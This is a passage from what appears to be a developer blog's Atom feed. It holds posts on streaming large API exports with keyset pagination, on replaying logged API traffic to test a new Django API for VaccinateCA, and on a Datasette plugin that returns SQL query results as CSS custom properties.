&lt;p&gt;Almost everything in the web stack is optimized for quickly serving small requests. But over the past decade the tide has turned somewhat: Node.js made async web servers commonplace, WebSockets taught us to handle long-running connections and in the Python world asyncio and &lt;a href="https://asgi.readthedocs.io/"&gt;ASGI&lt;/a&gt; provided a firm foundation for handling long-running requests using smaller amounts of RAM and CPU.&lt;/p&gt;
&lt;p&gt;I've been experimenting in this area for a few years now.&lt;/p&gt;
&lt;p&gt;Datasette has the ability to &lt;a href="https://github.com/simonw/datasette/blob/0.57.1/datasette/views/base.py#L264-L428"&gt;use ASGI trickery&lt;/a&gt; to &lt;a href="https://docs.datasette.io/en/stable/csv_export.html#streaming-all-records"&gt;stream all rows from a table&lt;/a&gt; (or filtered table) as CSV, potentially returning hundreds of MBs of data.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://django-sql-dashboard.datasette.io/"&gt;Django SQL Dashboard&lt;/a&gt; can export the full results of a SQL query as CSV or TSV, this time using Django's &lt;a href="https://docs.djangoproject.com/en/3.2/ref/request-response/#django.http.StreamingHttpResponse"&gt;StreamingHttpResponse&lt;/a&gt; (which does tie up a full worker process, but that's OK if you restrict it to a controlled number of authenticated users).&lt;/p&gt;
&lt;p&gt;&lt;a href="https://simonwillison.net/tags/vaccinateca/"&gt;VIAL&lt;/a&gt; implements streaming responses to offer an &lt;a href="https://github.com/CAVaccineInventory/vial/blob/cdaaab053a9cf1cef40104a2cdf480b7932d58f7/vaccinate/core/admin_actions.py"&gt;"export from the admin" feature&lt;/a&gt;. It also has an API-key-protected search API which can stream out all matching rows &lt;a href="https://github.com/CAVaccineInventory/vial/blob/cdaaab053a9cf1cef40104a2cdf480b7932d58f7/vaccinate/api/serialize.py#L38"&gt;in JSON or GeoJSON&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Implementation notes&lt;/h4&gt;
&lt;p&gt;The key thing to watch out for when implementing this pattern is memory usage: if your server buffers 100MB+ of data any time it needs to serve an export request you're going to run into trouble.&lt;/p&gt;
&lt;p&gt;Some export formats are friendlier for streaming than others. CSV and TSV are pretty easy to stream, as is newline-delimited JSON.&lt;/p&gt;
&lt;p&gt;Regular JSON requires a bit more thought: you can output a &lt;code&gt;[&lt;/code&gt; character, then output each row in a stream with a comma suffix, then skip the comma for the last row and output a &lt;code&gt;]&lt;/code&gt;. Doing that requires peeking ahead (looping two at a time) to verify that you haven't yet reached the end.&lt;/p&gt;
&lt;p&gt;Or... Martin De Wulf &lt;a href="https://twitter.com/madewulf/status/1405559088994467844"&gt;pointed out&lt;/a&gt; that you can output the first row, then output every other row with a preceeding comma - which avoids the whole "iterate two at a time" problem entirely.&lt;/p&gt;
&lt;p&gt;The next challenge is efficiently looping through every database result without first pulling them all into memory.&lt;/p&gt;
&lt;p&gt;PostgreSQL (and the &lt;code&gt;psycopg2&lt;/code&gt; Python module) offers &lt;a href="https://www.psycopg.org/docs/usage.html#server-side-cursors"&gt;server-side cursors&lt;/a&gt;, which means you can stream results through your code without loading them all at once. I use these &lt;a href="https://github.com/simonw/django-sql-dashboard/blob/dd1bb18e45b40ce8f3d0553a72b7ec3cdc329e69/django_sql_dashboard/views.py#L397-L399"&gt;in Django SQL Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Server-side cursors make me nervous though, because they seem like they likely tie up resources in the database itself. So the other technique I would consider here is &lt;a href="https://use-the-index-luke.com/no-offset"&gt;keyset pagination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Keyset pagination works against any data that is ordered by a unique column - it works especially well against a primary key (or other indexed column). Each page of data is retrieved using a query something like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; items &lt;span class="pl-k"&gt;order by&lt;/span&gt; id &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;21&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note the &lt;code&gt;limit 21&lt;/code&gt; - if we are retrieving pages of 20 items we ask for 21, since then we can use the last returned item to tell if there is a next page or not.&lt;/p&gt;
&lt;p&gt;Then for subsequent pages take the 20th &lt;code&gt;id&lt;/code&gt; value and ask for things greater than that:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; items &lt;span class="pl-k"&gt;where&lt;/span&gt; id &lt;span class="pl-k"&gt;&amp;gt;&lt;/span&gt; &lt;span class="pl-c1"&gt;20&lt;/span&gt; &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;21&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each of these queries is fast to respond (since it's against an ordered index) and uses a predictable, fixed amount of memory. Using keyset pagination we can loop through an abitrarily large table of data, streaming each page out one at a time, without exhausting any resources.&lt;/p&gt;
&lt;p&gt;And since each query is small and fast, we don't need to worry about huge queries tying up database resources either.&lt;/p&gt;
&lt;h4&gt;What can go wrong?&lt;/h4&gt;
&lt;p&gt;I really like these patterns. They haven't bitten me yet, though I've not deployed them for anything truly huge scale. So I &lt;a href="https://twitter.com/simonw/status/1405554676993433605"&gt;asked Twitter&lt;/a&gt; what kind of problems I should look for.&lt;/p&gt;
&lt;p&gt;Based on the Twitter conversation, here are some of the challenges that this approach faces.&lt;/p&gt;
&lt;h4&gt;Challenge: restarting servers&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p dir="ltr" lang="en"&gt;If the stream takes a significantly long time to finish then rolling out updates becomes a problem. You don't want to interrupt a download but also don't want to wait forever for it to finish to spin down the server.&lt;/p&gt;— Adam Lowry (@robotadam) &lt;a href="https://twitter.com/robotadam/status/1405556544897384459?ref_src=twsrc%5Etfw"&gt;June 17, 2021&lt;/a&gt;
&lt;/blockquote&gt;
&lt;p&gt;This came up a few times, and is something I hadn't considered. If your deployment process involves restarting your servers (and it's hard to imagine one that doesn't) you need to take long-running connections into account when you do that. If there's a user half way through a 500MB stream you can either truncate their connection or wait for them to finish.&lt;/p&gt;
&lt;h4 id="challenge-errors"&gt;Challenge: how to return errors&lt;/h4&gt;
&lt;p&gt;If you're streaming a response, you start with an HTTP 200 code... but then what happens if an error occurs half-way through, potentially while paginating through the database?&lt;/p&gt;
&lt;p&gt;You've already started sending the request, so you can't change the status code to a 500. Instead, you need to write some kind of error to the stream that's being produced.&lt;/p&gt;
&lt;p&gt;If you're serving up a huge JSON document, you can at least make that JSON become invalid, which should indicate to your client that something went wrong.&lt;/p&gt;
&lt;p&gt;Formats like CSV are harder. How do you let your user know that their CSV data is incomplete?&lt;/p&gt;
&lt;p&gt;And what if someone's connection drops - are they definitely going to notice that they are missing something, or will they assume that the truncated file is all of the data?&lt;/p&gt;
&lt;h4&gt;Challenge: resumable downloads&lt;/h4&gt;
&lt;p&gt;If a user is paginating through your API, they get resumability for free: if something goes wrong they can start again at the last page that they fetched.&lt;/p&gt;
&lt;p&gt;Resuming a single stream is a lot harder.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests"&gt;HTTP range mechanism&lt;/a&gt; can be used to provide resumable downloads against large files, but it only works if you generate the entire file in advance.&lt;/p&gt;
&lt;p&gt;There is a way to design APIs to support this, provided the data in the stream is in a predictable order (which it has to be if you're using keyset pagination, described above).&lt;/p&gt;
&lt;p&gt;Have the endpoint that triggers the download take an optional &lt;code&gt;?since=&lt;/code&gt; parameter, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GET /stream-everything?since=b24ou34
[
    {"id": "m442ecc", "name": "..."},
    {"id": "c663qo2", "name": "..."},
    {"id": "z434hh3", "name": "..."},
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here the &lt;code&gt;b24ou34&lt;/code&gt; is an identifier - it can be a deliberately opaque token, but it needs to be served up as part of the response.&lt;/p&gt;
&lt;p&gt;If the user is disconnected for any reason, they can start back where they left off by passing in the last ID that they successfully retrieved:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GET /stream-everything?since=z434hh3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This still requires some level of intelligence from the client application, but it's a reasonably simple pattern both to implement on the server and as a client.&lt;/p&gt;
&lt;h4&gt;Easiest solution: generate and return from cloud storage&lt;/h4&gt;
&lt;p&gt;It seems the most robust way to implement this kind of API is the least technically exciting: spin off a background task that generates the large response and pushes it to cloud storage (S3 or GCS), then redirect the user to a signed URL to download the resulting file.&lt;/p&gt;
&lt;p&gt;This is easy to scale, gives users complete files with content-length headers that they know they can download (and even resume-downloading, since range headers are supported by S3 and GCS). It also avoids any issues with server restarts caused by long connections.&lt;/p&gt;
&lt;p&gt;This is how Mixpanel handle their export feature, and it's &lt;a href="https://seancoates.com/blogs/lambda-payload-size-workaround"&gt;the solution Sean Coates came to&lt;/a&gt; when trying to find a workaround for the AWS Lambda/API Gate response size limit.&lt;/p&gt;
&lt;p&gt;If your goal is to provide your users a robust, reliable bulk-export mechanism for their data, export to cloud storage is probably the way to go.&lt;/p&gt;
&lt;p&gt;But streaming dynamic responses are a really neat trick, and I plan to keep exploring them!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/scaling"&gt;scaling&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/streaming"&gt;streaming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/asgi"&gt;asgi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/http-range-requests"&gt;http-range-requests&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="scaling"/><category term="streaming"/><category term="asgi"/><category term="http-range-requests"/></entry><entry><title>Replaying logs to exercise the new API</title><link href="https://simonwillison.net/2021/Mar/3/vaccinateca-2021-03-03/#atom-tag" rel="alternate"/><published>2021-03-03T17:00:00+00:00</published><updated>2021-03-03T17:00:00+00:00</updated><id>https://simonwillison.net/2021/Mar/3/vaccinateca-2021-03-03/#atom-tag</id><summary type="html">
    &lt;p class="context"&gt;&lt;em&gt;Originally posted to my internal blog at VaccinateCA&lt;/em&gt;&lt;/p&gt;&lt;p&gt;22 days ago &lt;a href="https://github.com/CAVaccineInventory/help.vaccinate/commit/0946d8196c8b5332c3a21dd1cd1fbd29c27037ef"&gt;n1mmy pushed a change&lt;/a&gt; to &lt;code&gt;help.vaccinate&lt;/code&gt; which logged full details of inoming Netlify function API traffic to an Airtable database.&lt;/p&gt;
&lt;p&gt;What an asset that is! The &lt;a href="https://airtable.com/tblvSiTbFMdCxv0Bq/viwJE9fQEfeHtPScq?blocks=hide" rel="nofollow"&gt;Airtable table over here&lt;/a&gt; currently contains over 9,000 logged API calls, including the full JSON POST body, when the call was receieved and which authenticated user made the call.&lt;/p&gt;
&lt;p&gt;This morning I exported that data as CSV from Airtable, and &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/blob/6d463148334f8b5c3f14c44561ea4b69efc08366/scripts/replay_api_logs_from_csv.py"&gt;wrote a Python script&lt;/a&gt; to replay those requests against my new imitation implementation of the API.&lt;/p&gt;
&lt;p&gt;Here's what that script looks like running against my localhost development server:&lt;/p&gt;
&lt;p&gt;&lt;img alt="import" src="https://user-images.githubusercontent.com/9599/109910446-fab60380-7c5c-11eb-9920-197d6c707853.gif" style="max-width:100%;"/&gt;&lt;/p&gt;
&lt;p&gt;You can track the work &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/issues/29"&gt;in this issue&lt;/a&gt; - the replay script helped me get to a place where every single report from the past 22 days can be safely ingested by the new API, with the exception of a tiny number of reports against locations which have since been deleted (which isn't supposed to happen - we try to soft-delete rather than full-delete things - but apparently a few deletes had slipped through).&lt;/p&gt;
&lt;h4&gt;
API logging&lt;/h4&gt;
&lt;p&gt;Since the Airtable API logs have so clearly proved their value, Jesse proposed &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/issues/24"&gt;using the same trick&lt;/a&gt; for the Django app. I implemented that today: the full incoming request body and outgoing response are now recorded in an &lt;code&gt;ApiLog&lt;/code&gt; model in Django. You can see those in the Django admin here: &lt;a href="https://vaccinateca-preview.herokuapp.com/admin/api/apilog/" rel="nofollow"&gt;https://vaccinateca-preview.herokuapp.com/admin/api/apilog/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Select_api_log_to_change___Django_site_admin" src="https://user-images.githubusercontent.com/9599/109911028-2e455d80-7c5e-11eb-9644-8deefd80b580.png" style="max-width:100%;"/&gt; &lt;img alt="Change_api_log___Django_site_admin" src="https://user-images.githubusercontent.com/9599/109910821-d9094c00-7c5d-11eb-9b00-e3867dfc5796.png" style="max-width:100%;"/&gt;&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/blob/6d463148334f8b5c3f14c44561ea4b69efc08366/vaccinate/api/models.py"&gt;the ORM model&lt;/a&gt; and the &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/blob/6d463148334f8b5c3f14c44561ea4b69efc08366/vaccinate/api/utils.py"&gt;view decorator&lt;/a&gt; that logs requests.&lt;/p&gt;
&lt;h4&gt;
Unit tests for the new API&lt;/h4&gt;
&lt;p&gt;I added tests for the &lt;code&gt;submitReport&lt;/code&gt; API. The tests are driven by example JSON fixtures - so far I've created two of those, but I hope that having them in this format will make it really easy to add more as we find edge-cases in the API and expand it with new features.&lt;/p&gt;
&lt;p&gt;Those API test fixtures live in &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/tree/6d463148334f8b5c3f14c44561ea4b69efc08366/vaccinate/api/test-data/submitReport"&gt;vaccinate/api/test-data/submitReport&lt;/a&gt;. Here's &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/blob/6d463148334f8b5c3f14c44561ea4b69efc08366/vaccinate/api/test_submit_report.py#L38-L73"&gt;the test code&lt;/a&gt; that executes them.&lt;/p&gt;
&lt;h4&gt;
Documentation for the new API&lt;/h4&gt;
&lt;p&gt;I wrote API documentation! You can &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/blob/6d463148334f8b5c3f14c44561ea4b69efc08366/docs/api.md"&gt;find that here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now that the API is documented I intend to update the documentation in lock-step with changes made to the API itself - using the pattern where every commit includes the change, the tests for the change AND the documentation for the change in a single unit.&lt;/p&gt;
&lt;h4&gt;
Dual-writing to Django&lt;/h4&gt;
&lt;p&gt;The combination of the replay script and the unit tests has left me feeling pretty confident that the replacement API is ready to start accepting traffic.&lt;/p&gt;
&lt;p&gt;The plan is to run the new system in parallel with Airtable for a few days to thoroughly test it and make sure it covers everything we need. Our Netlify functions offer a great place to do this, so this afternoon I submitted &lt;a href="https://github.com/CAVaccineInventory/help.vaccinate/pull/77"&gt;a pull request&lt;/a&gt; to &lt;code&gt;help.vaccinate&lt;/code&gt; to silently dual-write incoming API requests to the Django API, catching and logging any exceptions without intefering with the rest of the application flow.&lt;/p&gt;
&lt;p&gt;Testing this locally helped me identify some bugs in the way the Django app verified JWT tokens that originated with the &lt;code&gt;help.vaccinate&lt;/code&gt; application.&lt;/p&gt;
&lt;h4&gt;
Everything else&lt;/h4&gt;
&lt;p&gt;Here are &lt;a href="https://github.com/CAVaccineInventory/django.vaccinate/commits/6d463148334f8b5c3f14c44561ea4b69efc08366"&gt;my other commits from today&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/logging"&gt;logging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccinate-ca"&gt;vaccinate-ca&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccinate-ca-blog"&gt;vaccinate-ca-blog&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="logging"/><category term="vaccinate-ca"/><category term="vaccinate-ca-blog"/></entry><entry><title>APIs from CSS without JavaScript: the datasette-css-properties plugin</title><link href="https://simonwillison.net/2021/Jan/7/css-apis-no-javascript/#atom-tag" rel="alternate"/><published>2021-01-07T20:50:44+00:00</published><updated>2021-01-07T20:50:44+00:00</updated><id>https://simonwillison.net/2021/Jan/7/css-apis-no-javascript/#atom-tag</id><summary type="html">
    &lt;p&gt;I built a new Datasette plugin called &lt;a href="https://datasette.io/plugins/datasette-css-properties"&gt;datasette-css-properties&lt;/a&gt;. It's very, very weird - it adds a &lt;code&gt;.css&lt;/code&gt; output extension to Datasette which outputs the result of a SQL query using CSS custom property format. This means you can display the results of database queries using pure CSS and HTML, no JavaScript required!&lt;/p&gt;
&lt;p&gt;I was inspired by &lt;a href="https://css-tricks.com/custom-properties-as-state/"&gt;Custom Properties as State&lt;/a&gt;, published by by Chris Coyier earlier this week. Chris points out that since CSS custom properties can be defined by an external stylesheet, a crafty API could generate a stylesheet with dynamic properties that could then be displayed on an otherwise static page.&lt;/p&gt;
&lt;p&gt;This is a weird idea. Datasette's plugins system is pretty much designed for weird ideas - my favourite thing about having plugins is that I can try out things like this without any risk of damaging the integrity of the core project.&lt;/p&gt;
&lt;p&gt;So I built it! Here are some examples:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://latest-with-plugins.datasette.io/fixtures/roadside_attractions"&gt;roadside_attractions&lt;/a&gt; is a table that ships as part of Datasette's "fixtures" test database, which I write unit tests against and use for quick demos.&lt;/p&gt;
&lt;p&gt;The URL of that table within Datasette is &lt;code&gt;/fixtures/roadside_attractions&lt;/code&gt;. To get the first row in the table back as CSS properties, simply add a &lt;code&gt;.css&lt;/code&gt; extension:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://latest-with-plugins.datasette.io/fixtures/roadside_attractions.css"&gt;/fixtures/roadside_attractions.css&lt;/a&gt; returns this:&lt;/p&gt;
&lt;div class="highlight highlight-source-css"&gt;&lt;pre&gt;:&lt;span class="pl-c1"&gt;root&lt;/span&gt; {
  &lt;span class="pl-c1"&gt;--pk&lt;/span&gt;: &lt;span class="pl-s"&gt;'1'&lt;/span&gt;;
  &lt;span class="pl-c1"&gt;--name&lt;/span&gt;: &lt;span class="pl-s"&gt;'The Mystery Spot'&lt;/span&gt;;
  &lt;span class="pl-c1"&gt;--address&lt;/span&gt;: &lt;span class="pl-s"&gt;'465 Mystery Spot Road, Santa Cruz, CA 95065'&lt;/span&gt;;
  &lt;span class="pl-c1"&gt;--latitude&lt;/span&gt;: &lt;span class="pl-s"&gt;'37.0167'&lt;/span&gt;;
  &lt;span class="pl-c1"&gt;--longitude&lt;/span&gt;: &lt;span class="pl-s"&gt;'-122.0024'&lt;/span&gt;;
}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can make use of these properties in an HTML document like so:&lt;/p&gt;
&lt;div class="highlight highlight-text-html-basic"&gt;&lt;pre&gt;&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;link&lt;/span&gt; &lt;span class="pl-c1"&gt;rel&lt;/span&gt;="&lt;span class="pl-s"&gt;stylesheet&lt;/span&gt;" &lt;span class="pl-c1"&gt;href&lt;/span&gt;="&lt;span class="pl-s"&gt;https://latest-with-plugins.datasette.io/fixtures/roadside_attractions.css&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
.&lt;span class="pl-c1"&gt;attraction-name&lt;/span&gt;:&lt;span class="pl-c1"&gt;after&lt;/span&gt; { &lt;span class="pl-c1"&gt;content&lt;/span&gt;: &lt;span class="pl-en"&gt;var&lt;/span&gt;(&lt;span class="pl-s1"&gt;--name&lt;/span&gt;); }
.&lt;span class="pl-c1"&gt;attraction-address&lt;/span&gt;:&lt;span class="pl-c1"&gt;after&lt;/span&gt; { &lt;span class="pl-c1"&gt;content&lt;/span&gt;: &lt;span class="pl-en"&gt;var&lt;/span&gt;(&lt;span class="pl-s1"&gt;--address&lt;/span&gt;); }
&lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;p&lt;/span&gt; &lt;span class="pl-c1"&gt;class&lt;/span&gt;="&lt;span class="pl-s"&gt;attraction-name&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;Attraction name: &lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;p&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;p&lt;/span&gt; &lt;span class="pl-c1"&gt;class&lt;/span&gt;="&lt;span class="pl-s"&gt;attraction-address&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;Address: &lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;p&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here that is &lt;a href="https://codepen.io/simonwillison/pen/MWjXRdP"&gt;on CodePen&lt;/a&gt;. It outputs this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Attraction name: The Mystery Spot&lt;/p&gt;
&lt;p&gt;Address: 465 Mystery Spot Road, Santa Cruz, CA 95065&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Apparently modern screen readers will read these values, so they're at least somewhat accessible. Sadly users won't be able to copy and paste their values.&lt;/p&gt;
&lt;p&gt;Let's try something more fun: a stylesheet that changes colour based on the time of the day.&lt;/p&gt;
&lt;p&gt;I'm in San Francisco, which is currently 8 hours off UTC. So &lt;a href="https://latest-with-plugins.datasette.io/fixtures?sql=select+strftime%28%27%25H%27%2C+%27now%27%29+-+8"&gt;this SQL query&lt;/a&gt; gives me the current hour of the day in my timezone:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%H&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;now&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;8&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I'm going to define the following sequence of colours:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Midnight to 4am: black&lt;/li&gt;
&lt;li&gt;4am to 8am: grey&lt;/li&gt;
&lt;li&gt;8am to 4pm: yellow&lt;/li&gt;
&lt;li&gt;4pm to 6pm: orange&lt;/li&gt;
&lt;li&gt;6pm to midnight: black again&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here's a SQL query for that, using the &lt;code&gt;CASE&lt;/code&gt; expression:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt;
  CASE
    WHEN strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%H&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;now&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;8&lt;/span&gt; BETWEEN &lt;span class="pl-c1"&gt;4&lt;/span&gt;
    &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;7&lt;/span&gt; THEN &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;grey&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    WHEN strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%H&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;now&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;8&lt;/span&gt; BETWEEN &lt;span class="pl-c1"&gt;8&lt;/span&gt;
    &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;15&lt;/span&gt; THEN &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;yellow&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    WHEN strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%H&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;now&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;8&lt;/span&gt; BETWEEN &lt;span class="pl-c1"&gt;16&lt;/span&gt;
    &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;18&lt;/span&gt; THEN &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;orange&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    ELSE &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;black&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
  END &lt;span class="pl-k"&gt;as&lt;/span&gt; [&lt;span class="pl-k"&gt;time&lt;/span&gt;&lt;span class="pl-k"&gt;-&lt;/span&gt;of&lt;span class="pl-k"&gt;-&lt;/span&gt;day&lt;span class="pl-k"&gt;-&lt;/span&gt;color]&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Execute that &lt;a href="https://latest-with-plugins.datasette.io/fixtures?sql=SELECT%0D%0A++CASE%0D%0A++++WHEN+strftime%28%27%25H%27%2C+%27now%27%29+-+8+BETWEEN+4%0D%0A++++AND+7+THEN+%27grey%27%0D%0A++++WHEN+strftime%28%27%25H%27%2C+%27now%27%29+-+8+BETWEEN+8%0D%0A++++AND+15+THEN+%27yellow%27%0D%0A++++WHEN+strftime%28%27%25H%27%2C+%27now%27%29+-+8+BETWEEN+16%0D%0A++++AND+18+THEN+%27orange%27%0D%0A++++ELSE+%27black%27%0D%0A++END+as+%5Btime-of-day-color%5D"&gt;here&lt;/a&gt;, then add the &lt;code&gt;.css&lt;/code&gt; extension and &lt;a href="https://latest-with-plugins.datasette.io/fixtures.css?sql=SELECT%0D%0A++CASE%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+4%0D%0A++++AND+7+THEN+%27grey%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+8%0D%0A++++AND+15+THEN+%27yellow%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+16%0D%0A++++AND+18+THEN+%27orange%27%0D%0A++++ELSE+%27black%27%0D%0A++END+as+%5Btime-of-day-color%5D"&gt;you get this&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;:root {
  &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt;time-of-day-color: 'yellow';&lt;/span&gt;
}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This isn't quite right. The &lt;code&gt;yellow&lt;/code&gt; value is wrapped in single quotes - but that means it won't work as a colour if used like this:&lt;/p&gt;
&lt;div class="highlight highlight-text-html-basic"&gt;&lt;pre&gt;&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-ent"&gt;nav&lt;/span&gt; {
  &lt;span class="pl-c1"&gt;background-color&lt;/span&gt;: &lt;span class="pl-en"&gt;var&lt;/span&gt;(&lt;span class="pl-s1"&gt;--time-of-day-color&lt;/span&gt;);
}
&lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
